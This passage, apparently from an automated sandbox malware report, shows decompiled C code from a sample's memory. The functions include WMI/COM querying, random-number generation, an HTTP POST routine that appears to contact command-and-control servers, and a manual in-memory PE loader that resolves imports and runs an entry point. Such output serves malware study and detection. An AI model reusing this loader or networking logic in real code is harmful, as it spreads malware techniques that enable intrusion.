              					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
              					__eflags = _t178;
              					if(_t178 != 0) {
              						L52:
              						__imp__#6(_t324);
              						__imp__#6(_v52);
              						goto L53;
              					}
              					_t262 = _v32;
              					_v28 = 0;
              					_v20 = 0;
              					__eflags = _t262;
              					if(_t262 == 0) {
              						L49:
              						 *((intOrPtr*)( *_t262 + 8))(_t262);
              						__eflags = _t252;
              						if(_t252 == 0) {
              							E00738DDF( &_v36, 0);
              							_t320 = _v36;
              						} else {
              							 *(_t320 + 8) = _t252;
              							 *_t320 = E00739AB3(_v100);
              							 *((intOrPtr*)(_t320 + 4)) = E00739AB3(_v56);
              						}
              						goto L52;
              					} else {
              						goto L6;
              					}
              					while(1) {
              						L6:
              						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
              						__eflags = _t186;
              						if(_t186 != 0) {
              							break;
              						}
              						_v16 = 0;
              						_v48 = 0;
              						_v12 = 0;
              						_v24 = 0;
              						__eflags = _v84;
              						if(_v84 == 0) {
              							break;
              						}
              						_t187 = _v28;
              						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
              						__eflags = _t188;
              						if(_t188 >= 0) {
              							__imp__#20(_v24, 1,  &_v16);
              							__imp__#19(_v24, 1,  &_v48);
              							_t46 = _t320 + 0xc; // 0xc
              							_t253 = _t46;
              							_t327 = _t252 << 3;
              							_t47 = _t327 + 8; // 0x8
              							_t192 = E00738E5D(_t327, _t47);
              							__eflags = _t192;
              							if(_t192 == 0) {
              								__imp__#16(_v24);
              								_t193 = _v28;
              								 *((intOrPtr*)( *_t193 + 8))(_t193);
              								L46:
              								_t252 = _v20;
              								break;
              							}
              							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
              							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E00738DC9( *(_t327 +  *_t253) << 3);
              							_t200 =  *_t253;
              							__eflags =  *(_t327 + _t200 + 4);
              							if( *(_t327 + _t200 + 4) == 0) {
              								_t136 = _t320 + 0xc; // 0xc
              								E00738DDF(_t136, 0);
              								E00738DDF( &_v36, 0);
              								__imp__#16(_v24);
              								_t205 = _v28;
              								 *((intOrPtr*)( *_t205 + 8))(_t205);
              								_t320 = _v36;
              								goto L46;
              							}
              							_t207 = _v16;
              							while(1) {
              								_v12 = _t207;
              								__eflags = _t207 - _v48;
              								if(_t207 > _v48) {
              									break;
              								}
              								_v44 = _v44 & 0x00000000;
              								_t209 =  &_v12;
              								__imp__#25(_v24, _t209,  &_v44);
              								__eflags = _t209;
              								if(_t209 < 0) {
              									break;
              								}
              								_t212 = E00739AB3(_v44);
              								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
              								_t213 = _v28;
              								_t281 =  *_t213;
              								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
              								__eflags = _t214;
              								if(_t214 < 0) {
              									L39:
              									__imp__#6(_v44);
              									_t207 = _v12 + 1;
              									__eflags = _t207;
              									continue;
              								}
              								_v92 = E00739F85(_t281, 0xcc1);
              								 *_t329 = 0xabe;
              								_t217 = E00739F85(_t281);
              								_t283 = _v80;
              								_v96 = _t217;
              								_t218 = _t283 & 0x0000ffff;
              								__eflags = _t218 - 0xb;
              								if(__eflags > 0) {
              									_t219 = _t218 - 0x10;
              									__eflags = _t219;
              									if(_t219 == 0) {
              										L35:
              										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E00738DC9(0x18);
              										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
              										__eflags = _t289;
              										if(_t289 == 0) {
              											L38:
              											E00738D9A( &_v92);
              											E00738D9A( &_v96);
              											__imp__#9( &_v80);
              											goto L39;
              										}
              										_push(_v72);
              										_push(L"%d");
              										L37:
              										_push(0xc);
              										_push(_t289);
              										E00739FE4();
              										_t329 = _t329 + 0x10;
              										goto L38;
              									}
              									_t230 = _t219 - 1;
              									__eflags = _t230;
              									if(_t230 == 0) {
              										L33:
              										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E00738DC9(0x18);
              										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
              										__eflags = _t289;
              										if(_t289 == 0) {
              											goto L38;
              										}
              										_push(_v72);
              										_push(L"%u");
              										goto L37;
              									}
              									_t235 = _t230 - 1;
              									__eflags = _t235;
              									if(_t235 == 0) {
              										goto L33;
              									}
              									__eflags = _t235 == 1;
              									if(_t235 == 1) {
              										goto L33;
              									}
              									L28:
              									__eflags = _t283 & 0x00002000;
              									if((_t283 & 0x00002000) == 0) {
              										_v88 = E00739F85(_t283, 0x2a);
              										E00739FE4( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
              										E00738D9A( &_v88);
              										_t329 = _t329 + 0x18;
              										_t298 =  &_v616;
              										L31:
              										_t242 = E00739AB3(_t298);
              										L32:
              										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
              										goto L38;
              									}
              									_t242 = E0073E9AE( &_v80);
              									goto L32;
              								}
              								if(__eflags == 0) {
              									__eflags = _v72 - 0xffff;
              									_t298 = L"TRUE";
              									if(_v72 != 0xffff) {
              										_t298 = L"FALSE";
              									}
              									goto L31;
              								}
              								_t243 = _t218 - 1;
              								__eflags = _t243;
              								if(_t243 == 0) {
              									goto L38;
              								}
              								_t244 = _t243 - 1;
              								__eflags = _t244;
              								if(_t244 == 0) {
              									goto L35;
              								}
              								_t245 = _t244 - 1;
              								__eflags = _t245;
              								if(_t245 == 0) {
              									goto L35;
              								}
              								__eflags = _t245 != 5;
              								if(_t245 != 5) {
              									goto L28;
              								}
              								_t298 = _v72;
              								goto L31;
              							}
              							__imp__#16(_v24);
              							_t210 = _v28;
              							 *((intOrPtr*)( *_t210 + 8))(_t210);
              							_t252 = _v20;
              							L42:
              							_t262 = _v32;
              							_t252 = _t252 + 1;
              							_v20 = _t252;
              							__eflags = _t262;
              							if(_t262 != 0) {
              								continue;
              							}
              							L48:
              							_t324 = _v40;
              							goto L49;
              						}
              						_t247 = _v28;
              						 *((intOrPtr*)( *_t247 + 8))(_t247);
              						goto L42;
              					}
              					_t262 = _v32;
              					goto L48;
              				} else {
              					E00738DDF( &_v36, _t322);
              					_t320 = _v36;
              					goto L53;
              				}
              			}

              APIs
                • Part of subcall function 0073E485: CoInitializeEx.OLE32(00000000,00000000,00000000,00000000,00000000,00000000,?,0073E7B4,00000E16,00000000,00000000,00000005), ref: 0073E498
                • Part of subcall function 0073E485: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,0073E7B4,00000E16,00000000,00000000,00000005), ref: 0073E4A9
                • Part of subcall function 0073E485: CoCreateInstance.OLE32(0074C8A0,00000000,00000001,0074C8B0,00000000,?,0073E7B4,00000E16,00000000,00000000,00000005), ref: 0073E4C0
                • Part of subcall function 0073E485: SysAllocString.OLEAUT32(00000000), ref: 0073E4CB
                • Part of subcall function 0073E485: CoSetProxyBlanket.OLE32(00000005,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,0073E7B4,00000E16,00000000,00000000,00000005), ref: 0073E4F6
                • Part of subcall function 00738DC9: RtlAllocateHeap.NTDLL(00000008,?,?,00739793,00000100,?,0073661B), ref: 00738DD7
              • SysAllocString.OLEAUT32(00000000), ref: 0073EB73
              • SysAllocString.OLEAUT32(00000000), ref: 0073EB87
              • SysFreeString.OLEAUT32(?), ref: 0073EF0D
              • SysFreeString.OLEAUT32(?), ref: 0073EF16
                • Part of subcall function 00738DDF: HeapFree.KERNEL32(00000000,00000000), ref: 00738E25
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
              Yara matches
              Similarity
              • API ID: String$AllocFree$HeapInitialize$AllocateBlanketCreateInstanceProxySecurity
              • String ID: FALSE$TRUE
              • API String ID: 1290676130-1412513891
              • Opcode ID: aec18a4e1d53c7284b1defc1fbd69a864d0eadf7162e67476095bb2343a5cafb
              • Instruction ID: cf3851d2065922089378d3f734c088b5783ab6d89fcdc9807314081775451fcc
              • Opcode Fuzzy Hash: aec18a4e1d53c7284b1defc1fbd69a864d0eadf7162e67476095bb2343a5cafb
              • Instruction Fuzzy Hash: F5E14C71E00219EFEB14DFA4C889EEEBBB9FF48300F104559F505AB296DB79A901CB50
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 30%
              			E00742951(intOrPtr* _a4) {
              				signed int _v8;
              				_Unknown_base(*)()* _v12;
              				char _v16;
              				_Unknown_base(*)()* _t15;
              				void* _t20;
              				intOrPtr* _t25;
              				intOrPtr* _t29;
              				struct HINSTANCE__* _t30;
              
              				_v8 = _v8 & 0x00000000;
              				_t30 = GetModuleHandleW(L"advapi32.dll");
              				if(_t30 == 0) {
              					L7:
              					return 1;
              				}
              				_t25 = GetProcAddress(_t30, "CryptAcquireContextA");
              				if(_t25 == 0) {
              					goto L7;
              				}
              				_t15 = GetProcAddress(_t30, "CryptGenRandom");
              				_v12 = _t15;
              				if(_t15 == 0) {
              					goto L7;
              				}
              				_t29 = GetProcAddress(_t30, "CryptReleaseContext");
              				if(_t29 == 0) {
              					goto L7;
              				}
              				_push(0xf0000000);
              				_push(1);
              				_push(0);
              				_push(0);
              				_push( &_v8);
              				if( *_t25() == 0) {
              					goto L7;
              				}
              				_t20 = _v12(_v8, 4,  &_v16);
              				 *_t29(_v8, 0);
              				if(_t20 == 0) {
              					goto L7;
              				}
              				 *_a4 = E007428AC( &_v16);
              				return 0;
              			}

              APIs
              • GetModuleHandleW.KERNEL32(advapi32.dll,00000000,00000000,00000000,00737C84), ref: 00742963
              • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 0074297B
              • GetProcAddress.KERNEL32(00000000,CryptGenRandom), ref: 00742989
              • GetProcAddress.KERNEL32(00000000,CryptReleaseContext), ref: 00742998
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
              Yara matches
              Similarity
              • API ID: AddressProc$HandleModule
              • String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
              • API String ID: 667068680-129414566
              • Opcode ID: bb22f30b46c0db0e02967fce1ca02a16f1c8ab11a768269f44c35f87c38bdf55
              • Instruction ID: 4fc301aba9213e13e15a9b11f7a8f7bbca262da9d98c133482412b8d799eceae
              • Opcode Fuzzy Hash: bb22f30b46c0db0e02967fce1ca02a16f1c8ab11a768269f44c35f87c38bdf55
              • Instruction Fuzzy Hash: A211C876A48719BBDB2196B48C46F9FB6ACAF45750F510161FA00F31D0DBB8EE018654
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 93%
              			E0073F7A3(void* __edx, intOrPtr _a4, intOrPtr _a8, signed int* _a12, signed int* _a16, signed int* _a20, signed int _a24) {
              				signed int _v8;
              				signed int _v12;
              				char _v16;
              				char _v20;
              				char _v24;
              				intOrPtr _v28;
              				int _v32;
              				signed int _v36;
              				intOrPtr _v40;
              				intOrPtr _v44;
              				intOrPtr _v48;
              				intOrPtr _v52;
              				char _v56;
              				int _v68;
              				void* _v72;
              				intOrPtr _v92;
              				int _v96;
              				void* _v100;
              				intOrPtr _v104;
              				intOrPtr _v108;
              				char* _v112;
              				char _v116;
              				char _v132;
              				void _v388;
              				void _v644;
              				intOrPtr _t94;
              				intOrPtr _t102;
              				signed int _t104;
              				intOrPtr* _t105;
              				intOrPtr _t110;
              				signed int _t111;
              				signed int _t112;
              				intOrPtr _t115;
              				signed int _t116;
              				char _t117;
              				intOrPtr _t119;
              				char _t122;
              				intOrPtr _t127;
              				signed int _t129;
              				intOrPtr _t135;
              				intOrPtr _t139;
              				intOrPtr _t143;
              				intOrPtr _t145;
              				intOrPtr _t147;
              				intOrPtr _t153;
              				intOrPtr _t155;
              				intOrPtr _t159;
              				void* _t163;
              				signed int _t165;
              				void* _t166;
              				intOrPtr _t179;
              				signed int _t186;
              				char _t188;
              				signed int _t189;
              				void* _t190;
              				char _t193;
              				signed int _t194;
              				signed int _t195;
              				void* _t196;
              
              				_v24 = 4;
              				_v32 = 0;
              				_v28 = 1;
              				_t190 = __edx;
              				memset( &_v388, 0, 0x100);
              				memset( &_v644, 0, 0x100);
              				_t166 = 0x65;
              				_v56 = E00739F6B(_t166);
              				_v52 = E00739F6B(0xcc6);
              				_v48 = E00739F6B(0xe03);
              				_v44 = E00739F6B(0x64c);
              				_t94 = E00739F6B(0x80a);
              				_v36 = _v36 & 0;
              				_t188 = 0x3c;
              				_v40 = _t94;
              				E00738F63( &_v116, 0, 0x100);
              				_v108 = 0x10;
              				_v112 =  &_v132;
              				_v116 = _t188;
              				_v100 =  &_v388;
              				_v96 = 0x100;
              				_v72 =  &_v644;
              				_push( &_v116);
              				_push(0);
              				_v68 = 0x100;
              				_push(E0073A5D0(_t190));
              				_t102 =  *0x74f8f0; // 0x0
              				_push(_t190);
              				if( *((intOrPtr*)(_t102 + 0x28))() != 0) {
              					_t104 = 0;
              					__eflags = 0;
              					_v12 = 0;
              					do {
              						_t105 =  *0x74f8f0; // 0x0
              						_v8 = 0x8404f700;
              						_t189 =  *_t105( *0x74f9d8,  *((intOrPtr*)(_t196 + _t104 * 4 - 0x1c)), 0, 0, 0);
              						__eflags = _t189;
              						if(_t189 != 0) {
              							E0073F73B(_t189);
              							_t110 =  *0x74f8f0; // 0x0
              							_t111 =  *((intOrPtr*)(_t110 + 0x1c))(_t189,  &_v388, _v92, 0, 0, 3, 0, 0);
              							__eflags = _a24;
              							_t165 = _t111;
              							if(_a24 != 0) {
              								E0073A1F8(_a24);
              							}
              							__eflags = _t165;
              							if(_t165 != 0) {
              								__eflags = _v104 - 4;
              								_t112 = 0x8484f700;
              								if(_v104 != 4) {
              									_t112 = _v8;
              								}
              								_t115 =  *0x74f8f0; // 0x0
              								_t116 =  *((intOrPtr*)(_t115 + 0x20))(_t165, "POST",  &_v644, 0, 0,  &_v56, _t112, 0);
              								_v8 = _t116;
              								__eflags = _a24;
              								if(_a24 != 0) {
              									E0073A1F8(_a24);
              									_t116 = _v8;
              								}
              								__eflags = _t116;
              								if(_t116 != 0) {
              									__eflags = _v104 - 4;
              									if(_v104 == 4) {
              										E0073F6E9(_t116);
              									}
              									_t117 = E00739F6B(0x82e);
              									_t193 = _t117;
              									_v16 = _t193;
              									_t119 =  *0x74f8f0; // 0x0
              									_t194 = _v8;
              									_v8 =  *((intOrPtr*)(_t119 + 0x24))(_t194, _t193, E0073A5D0(_t193), _a4, _a8);
              									E00738D87( &_v16);
              									__eflags = _a24;
              									if(_a24 != 0) {
              										E0073A1F8(_a24);
              									}
              									__eflags = _v8;
              									if(_v8 != 0) {
              										L25:
              										_t122 = 8;
              										_v24 = _t122;
              										_v20 = 0;
              										_v16 = 0;
              										E00738F63( &_v20, 0, _t122);
              										_t127 =  *0x74f8f0; // 0x0
              										__eflags =  *((intOrPtr*)(_t127 + 0xc))(_t194, 0x13,  &_v20,  &_v24, 0);
              										if(__eflags != 0) {
              											_t129 = E0073A102( &_v20, __eflags);
              											__eflags = _t129 - 0xc8;
              											if(_t129 == 0xc8) {
              												 *_a20 = _t194;
              												 *_a12 = _t189;
              												 *_a16 = _t165;
              												__eflags = 0;
              												return 0;
              											}
              											_v12 =  ~_t129;
              											L29:
              											_t135 =  *0x74f8f0; // 0x0
              											 *((intOrPtr*)(_t135 + 8))(_t194);
              											_t195 = _v12;
              											L30:
              											__eflags = _t165;
              											if(_t165 != 0) {
              												_t139 =  *0x74f8f0; // 0x0
              												 *((intOrPtr*)(_t139 + 8))(_t165);
              											}
              											__eflags = _t189;
              											if(_t189 != 0) {
              												_t179 =  *0x74f8f0; // 0x0
              												 *((intOrPtr*)(_t179 + 8))(_t189);
              											}
              											return _t195;
              										}
              										GetLastError();
              										_v12 = 0xfffffff8;
              										goto L29;
              									} else {
              										GetLastError();
              										_t143 =  *0x74f8f0; // 0x0
              										 *((intOrPtr*)(_t143 + 8))(_t194);
              										_t145 =  *0x74f8f0; // 0x0
              										_v8 = _v8 & 0x00000000;
              										 *((intOrPtr*)(_t145 + 8))(_t165);
              										_t147 =  *0x74f8f0; // 0x0
              										_t165 = 0;
              										__eflags = 0;
              										 *((intOrPtr*)(_t147 + 8))(_t189);
              										_t194 = _v8;
              										goto L21;
              									}
              								} else {
              									GetLastError();
              									_t153 =  *0x74f8f0; // 0x0
              									 *((intOrPtr*)(_t153 + 8))(_t165);
              									_t155 =  *0x74f8f0; // 0x0
              									_t165 = 0;
              									 *((intOrPtr*)(_t155 + 8))(_t189);
              									_t189 = 0;
              									_t194 = _v8;
              									goto L22;
              								}
              							} else {
              								GetLastError();
              								_t159 =  *0x74f8f0; // 0x0
              								 *((intOrPtr*)(_t159 + 8))(_t189);
              								L21:
              								_t189 = 0;
              								__eflags = 0;
              								goto L22;
              							}
              						}
              						GetLastError();
              						L22:
              						_t186 = _t194;
              						_t104 = _v12 + 1;
              						_v12 = _t104;
              						__eflags = _t104 - 2;
              					} while (_t104 < 2);
              					__eflags = _t186;
              					if(_t186 != 0) {
              						goto L25;
              					}
              					_t195 = 0xfffffffe;
              					goto L30;
              				}
              				_t163 = 0xfffffffc;
              				return _t163;
              			}

              APIs
              • memset.MSVCRT ref: 0073F7D4
              • memset.MSVCRT ref: 0073F7E5
                • Part of subcall function 00738F63: memset.MSVCRT ref: 00738F75
              • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,000007D0,00000000), ref: 0073F8BA
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
              Yara matches
              Similarity
              • API ID: memset$ErrorLast
              • String ID: POST
              • API String ID: 2570506013-1814004025
              • Opcode ID: 68f404b2e0acd0d13bab8e04fc099641bfb2ee3f1317ac5396b3492ca0291229
              • Instruction ID: f475be69134340f7f5fee2fe0763122535891fca8526c05c13338dcfd904b36b
              • Opcode Fuzzy Hash: 68f404b2e0acd0d13bab8e04fc099641bfb2ee3f1317ac5396b3492ca0291229
              • Instruction Fuzzy Hash: 17A14D75D00219EFEB10DFA4D848AAEB7B8FF49310F24816AF505E7251DB789E40CB65
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
              Yara matches
              Similarity
              • API ID: _snprintfqsort
              • String ID: %I64d$false$null$true
              • API String ID: 756996078-4285102228
              • Opcode ID: ac8f1e81168a333e73565d15fef3361f3a8e215609cbb4e0b045559ca061f6a5
              • Instruction ID: d15c60f4ce308df5b71b9b5deacbe5c42cc7f689bafb473b6a022f3bf51c1677
              • Opcode Fuzzy Hash: ac8f1e81168a333e73565d15fef3361f3a8e215609cbb4e0b045559ca061f6a5
              • Instruction Fuzzy Hash: CBE1ABB1A0020AFBDF11AF64CC46EEF7B69EF55344F908025FD15DA141E779DAA08BA0
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 20%
              			E00743DC7(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, CHAR* _a16, intOrPtr _a20) {
              				signed int _v5;
              				signed short _v12;
              				intOrPtr* _v16;
              				intOrPtr _v20;
              				signed int* _v24;
              				unsigned int _v28;
              				signed short* _v32;
              				struct HINSTANCE__* _v36;
              				signed int _v40;
              				signed int _v44;
              				intOrPtr* _v48;
              				signed short* _v52;
              				intOrPtr _v56;
              				intOrPtr _v60;
              				intOrPtr _v64;
              				_Unknown_base(*)()* _v68;
              				signed int _v72;
              				intOrPtr _v76;
              				intOrPtr _v80;
              				intOrPtr _v84;
              				intOrPtr _v88;
              				intOrPtr _v92;
              				signed int _v96;
              				intOrPtr _v100;
              				intOrPtr _v104;
              				intOrPtr _v108;
              				intOrPtr _v112;
              				CHAR* _v116;
              				signed int _v120;
              				intOrPtr _v124;
              				signed int _v128;
              				signed int _v132;
              				signed int _t216;
              				signed int _t233;
              				void* _t273;
              				signed int _t278;
              				signed int _t280;
              				intOrPtr _t320;
              
              				_v44 = _v44 & 0x00000000;
              				_v84 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
              				_v20 = _v84;
              				_t320 = _a4 -  *((intOrPtr*)(_v20 + 0x34));
              				_v64 = _t320;
              				if(_t320 == 0) {
              					L13:
              					while(0 != 0) {
              					}
              					_push(8);
              					if( *((intOrPtr*)(_v20 + 0xbadc25)) == 0) {
              						L35:
              						if(_a16 == 0) {
              							L54:
              							_v80 =  *((intOrPtr*)(_v20 + 0x28)) + _a4;
              							while(0 != 0) {
              							}
              							if(_a12 != 0) {
              								 *_a12 = _v80;
              							}
              							 *((intOrPtr*)(_v20 + 0x34)) = _a4;
              							_v124 = _v80(_a4, 1, _a8);
              							while(0 != 0) {
              							}
              							if(_v124 != 0) {
              								if(_v44 == 0) {
              									L77:
              									return 1;
              								}
              								if(_a20 != 1) {
              									if(_a20 != 2) {
              										L75:
              										while(0 != 0) {
              										}
              										goto L77;
              									}
              									while(0 != 0) {
              									}
              									_v132 = _v44;
              									goto L75;
              								}
              								while(0 != 0) {
              								}
              								_v44();
              								goto L75;
              							}
              							while(0 != 0) {
              							}
              							return 0;
              						}
              						while(0 != 0) {
              						}
              						_push(8);
              						if( *((intOrPtr*)(_v20 + 0x78)) == 0) {
              							goto L54;
              						}
              						_v128 = 0x80000000;
              						_t216 = 8;
              						_v76 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t216 * 0));
              						_v108 = _a4 +  *((intOrPtr*)(_v76 + 0x20));
              						_v112 = _a4 +  *((intOrPtr*)(_v76 + 0x1c));
              						_v104 =  *((intOrPtr*)(_v76 + 0x18));
              						while(0 != 0) {
              						}
              						_v40 = _v40 & 0x00000000;
              						while(_v40 < _v104) {
              							_v116 = _a4 +  *((intOrPtr*)(_v108 + _v40 * 4));
              							_v120 = _a4 +  *((intOrPtr*)(_v112 + _v40 * 4));
              							if(lstrcmpA(_v116, _a16) != 0) {
              								_v40 = _v40 + 1;
              								continue;
              							}
              							while(0 != 0) {
              							}
              							_v44 = _v120;
              							break;
              						}
              						if(_v44 != 0) {
              							goto L54;
              						}
              						while(0 != 0) {
              						}
              						return 0xffffffff;
              					}
              					_v96 = 0x80000000;
              					_t233 = 8;
              					_v16 = _a4 +  *((intOrPtr*)(_v20 + (_t233 << 0) + 0x78));
              					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
              						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
              						if(_v36 == 0) {
              							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
              						}
              						if(_v36 != 0) {
              							if( *_v16 == 0) {
              								_v24 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
              							} else {
              								_v24 =  *_v16 + _a4;
              							}
              							_v72 = _v72 & 0x00000000;
              							while( *_v24 != 0) {
              								if(( *_v24 & _v96) == 0) {
              									_v100 =  *_v24 + _a4;
              									_v68 = GetProcAddress(_v36, _v100 + 2);
              								} else {
              									_v68 = GetProcAddress(_v36,  *_v24 & 0x0000ffff);
              								}
              								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
              									 *_v24 = _v68;
              								} else {
              									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v72) = _v68;
              								}
              								_v24 =  &(_v24[1]);
              								_v72 = _v72 + 4;
              							}
              							_v16 = _v16 + 0x14;
              							continue;
              						} else {
              							_t273 = 0xfffffffd;
              							return _t273;
              						}
              					}
              					goto L35;
              				}
              				_t278 = 8;
              				_v52 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t278 * 5));
              				_t280 = 8;
              				_v56 =  *((intOrPtr*)(_v20 + 0x7c + _t280 * 5));
              				while(0 != 0) {
              				}
              				while(_v56 > 0) {
              					_v28 = _v52[2];
              					_t27 =  &_v28; // 0x743978
              					_v56 = _v56 -  *_t27;
              					_t29 =  &_v28; // 0x743978
              					_v28 =  *_t29 - 8;
              					_t31 =  &_v28; // 0x743978
              					_v28 =  *_t31 >> 1;
              					_v32 =  &(_v52[4]);
              					_v92 = _a4 +  *_v52;
              					_t38 =  &_v28; // 0x743978
              					_v60 =  *_t38;
              					while(1) {
              						_v88 = _v60;
              						_v60 = _v60 - 1;
              						if(_v88 == 0) {
              							break;
              						}
              						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
              						_v12 =  *_v32 & 0xfff;
              						_v48 = (_v12 & 0x0000ffff) + _v92;
              						if((_v5 & 0x000000ff) != 3) {
              							if((_v5 & 0x000000ff) == 0xa) {
              								 *_v48 =  *_v48 + _v64;
              							}
              						} else {
              							 *_v48 =  *_v48 + _v64;
              						}
              						_v32 =  &(_v32[1]);
              					}
              					_v52 = _v32;
              				}
              				goto L13;
              			}

              APIs
              • GetModuleHandleA.KERNEL32(00000000), ref: 00743F2E
              • LoadLibraryA.KERNEL32(00000000), ref: 00743F47
              • GetProcAddress.KERNEL32(00000000,?), ref: 00743FA3
              • GetProcAddress.KERNEL32(00000000,?), ref: 00743FC2
              • lstrcmpA.KERNEL32(?,00000000), ref: 007440B3
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
              Yara matches
              Similarity
              • API ID: AddressProc$HandleLibraryLoadModulelstrcmp
              • String ID: x9t
              • API String ID: 1872726118-4233091173
              • Opcode ID: 9e4a30532ff9a7f95d8c8149a802bc7410c5e771dde3ef02573939e5856bbb61
              • Instruction ID: ddc0835a5bac2310315a17f322e46579acb89834ed1c5fe451bcb69f94beb8a4
              • Opcode Fuzzy Hash: 9e4a30532ff9a7f95d8c8149a802bc7410c5e771dde3ef02573939e5856bbb61
              • Instruction Fuzzy Hash: 48E1AF74E00219DFDB14CFA8C880BADBBF1BF08314F24855AE915AB361D738AA95DF54
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 83%
              			E0073503F(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, WCHAR* _a12) {
              				void _v532;
              				char _v548;
              				char _v580;
              				char _v584;
              				short _v588;
              				WCHAR* _v592;
              				WCHAR* _v596;
              				intOrPtr _v600;
              				char _v628;
              				char _v632;
              				void* __ebx;
              				void* __esi;
              				short _t47;
              				WCHAR* _t54;
              				WCHAR* _t55;
              				intOrPtr _t56;
              				signed int _t61;
              				void* _t65;
              				void* _t66;
              				WCHAR* _t67;
              				intOrPtr _t68;
              				WCHAR* _t70;
              				intOrPtr _t71;
              				WCHAR* _t73;
              				WCHAR* _t83;
              				intOrPtr _t84;
              				void* _t85;
              				intOrPtr _t86;
              				void* _t93;
              				intOrPtr _t94;
              				intOrPtr _t96;
              				void* _t99;
              				void* _t100;
              				WCHAR* _t101;
              				void* _t112;
              				WCHAR* _t116;
              				intOrPtr _t127;
              				void* _t128;
              				void* _t146;
              				WCHAR* _t149;
              				void* _t150;
              				void* _t152;
              				void* _t156;
              				WCHAR* _t157;
              				WCHAR* _t159;
              				signed int _t160;
              				signed int _t161;
              				intOrPtr* _t163;
              				signed int _t165;
              				void* _t168;
              				void* _t169;
              				intOrPtr* _t170;
              				void* _t175;
              
              				_t175 = __fp0;
              				_push(_t160);
              				_t99 = __edx;
              				_t156 = __ecx;
              				_t161 = _t160 | 0xffffffff;
              				memset( &_v532, 0, 0x20c);
              				_t168 = (_t165 & 0xfffffff8) - 0x254 + 0xc;
              				_v592 = 1;
              				if(_t156 != 0) {
              					_t94 =  *0x74f8d4; // 0xc2fc00
              					_t3 = _t94 + 0x110; // 0xc316d0
              					_t96 =  *0x74f8d8; // 0xc2fab0
              					_v600 =  *((intOrPtr*)(_t96 + 0x68))(_t156,  *((intOrPtr*)( *_t3)));
              				}
              				if(E0073CB85(_t156) != 0) {
              					L4:
              					_t47 = E0073C85A();
              					_push(_t99);
              					_v588 = _t47;
              					E0073C64D(_t47,  &_v580, _t173, _t175);
              					_t100 = E00734FFB( &_v580,  &_v580, _t173);
              					_t112 = E0073E34A( &_v580, E0073A5D0( &_v580), 0);
              					E0073C870(_t112,  &_v548, _t175);
              					_push(_t112);
              					_t54 = E00733174(_t156,  &_v580, _t173, _t175);
              					_v596 = _t54;
              					if(_t54 != 0) {
              						_push(0);
              						_push(_t100);
              						_push(0x74c9d8);
              						_t55 = E00739C50(_t54);
              						_t169 = _t168 + 0x10;
              						_t101 = _t55;
              						__eflags = _v592;
              						if(__eflags != 0) {
              							_t56 = E00739AB3(_v596);
              							_t116 = _t101;
              							 *0x74f990 = _t56;
              							E0074F988 = E00739AB3(_t116);
              							L12:
